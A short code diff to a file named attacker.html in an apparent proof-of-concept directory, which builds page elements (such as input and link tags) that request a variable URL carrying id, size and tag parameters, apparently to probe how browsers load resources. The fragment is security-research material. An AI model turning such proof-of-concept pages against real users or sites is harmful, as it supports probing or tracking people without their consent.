--- a/src/poc2/attacker.html
+++ b/src/poc2/attacker.html
@@ -18,8 +18,9 @@
         let element = document.createElement(tag);
 
         if (tag == 'input') {
-          console.log('input');
           element.type = 'image';
+        } else if (tag == 'link') {
+          element.type = 'external';
         }
 
         element[attribute] = `${url}?id=${id < 10 ? '0' + id : id}&size=${size}&tag=${tag}-${attribute}`;
